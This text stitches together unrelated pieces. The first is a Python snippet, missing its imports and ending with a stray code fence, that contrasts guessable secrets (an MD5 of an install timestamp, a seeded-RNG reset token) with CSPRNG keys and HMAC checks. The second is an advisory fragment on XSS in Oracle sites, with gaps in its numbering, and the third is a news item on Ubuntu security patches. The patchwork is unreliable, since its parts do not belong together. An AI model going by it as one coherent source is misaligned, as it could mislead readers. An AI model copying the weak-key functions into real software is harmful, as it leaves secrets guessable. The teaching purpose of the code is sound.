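SECONDS_PER_YEAR = 365 * 24 * 60 * 60      # 31,536,000 candidate timestamps per year
TOKEN_ALPHABET = string.ascii_letters + string.digits


def weak_key_from_timestamp(install_ts: int) -> str:
    """Pattern from the WP-Slimstat post: secret key = MD5(install timestamp).
    Fully determined by one value an outsider can bound, so it is guessable."""
    return hashlib.md5(str(install_ts).encode("ascii")).hexdigest()


def weak_key_search_space(years_uncertainty: float) -> int:
    """Candidates to try when the install time is known to within `years_uncertainty`."""
    return int(years_uncertainty * SECONDS_PER_YEAR)


def entropy_bits(search_space: int) -> float:
    """Effective key strength, in bits, for a search space of that size."""
    return math.log2(search_space)


def predictable_reset_token(seed: int, length: int = 20) -> str:
    """Pattern from the WordPress item: a reset token from a userland RNG.
    Anyone who knows (or can predict) the seed regenerates the same token."""
    rng = random.Random(seed)
    return "".join(rng.choice(TOKEN_ALPHABET) for _ in range(length))


def strong_key(nbytes: int = 32) -> bytes:
    """Key from the OS CSPRNG (secrets -> os.urandom); not derivable from
    anything an outsider can observe."""
    return secrets.token_bytes(nbytes)


def password_reset_token() -> str:
    """Reset token from the OS CSPRNG: 32 random bytes, URL-safe base64 encoded."""
    return secrets.token_urlsafe(32)


def sign(key: bytes, data: bytes) -> str:
    """HMAC-SHA256 over data exchanged with the visitor's browser. The tag is
    only as unforgeable as the key is unpredictable, which is why the key's
    source matters more than the hash used."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify(key: bytes, data: bytes, tag: str) -> bool:
    """Constant-time comparison so the check itself leaks nothing about the tag."""
    return hmac.compare_digest(sign(key, data), tag)


if __name__ == "__main__":
    # Constructed installation timestamp (2014-03-01 00:00:00 UTC).
    weak = weak_key_from_timestamp(1393632000)
    print("weak key:", weak,
          "search space bits:", round(entropy_bits(weak_key_search_space(1)), 1))
    strong = strong_key()
    tag = sign(strong, b"visitor=203.0.113.5")
    print("hmac verifies:", verify(strong, b"visitor=203.0.113.5", tag))
    print("reset token:", password_reset_token())
```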
Threat Level: High
Severity: High
CVSS Severity Score: 7.0
Impact Type: Complete confidentiality, integrity and availability violation. [2]
Vulnerability: (1) Filtration Bypass. (3) Unauthenticated Cross Site Scripting vulnerabilities.

Description: A malicious user could trick unsuspecting visitors into divulging their credentials, force a redirection to a third-party website, or execute malicious code on behalf of the attacker. An attacker can also fold malicious content into the content being delivered to visitors on the site. In this attack the “Visitor -> Vendor” trust level is directly impacted, since the vendor’s website and its associated services and products have high levels of trust by default.

Read more: http://dl.packetstormsecurity.net/1501-advisories/Oracle_Website_Vulnerabilities119.pdf
Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu. Thunderbird is Mozilla’s email client, and the company recently fixed several memory corruption vulnerabilities, along with a cross-site request forgery bug and a flaw that could lead to a session-fixation attack.

“If a user were tricked into opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Thunderbird,” the Ubuntu advisory says, referring to the memory corruption vulnerabilities.

The CSRF weakness in Thunderbird could be exploited if an attacker can get a user to open a malicious message while scripting is enabled. The session-fixation attack could occur under some circumstances if a user is connected to a malicious web proxy.

In addition to the Thunderbird vulnerabilities, there are also patches for several other flaws in Ubuntu. One of the patches fixes a bug in libssh that could cause a denial of service. “It was discovered that libssh incorrectly handled certain kexinit packets. A remote attacker could possibly use this issue to cause libssh to crash, resulting in a denial of service,” the advisory says.

There are also two vulnerabilities in the RPM package that could let a local attacker execute arbitrary code, and a bug in libevent that could allow code execution in some cases. “Andrew Bartlett discovered that libevent incorrectly handled large inputs to the evbuffer API. A remote attacker could possibly use this issue with an application that uses libevent to cause a denial of service, or possibly execute arbitrary code,” the Ubuntu advisory says.
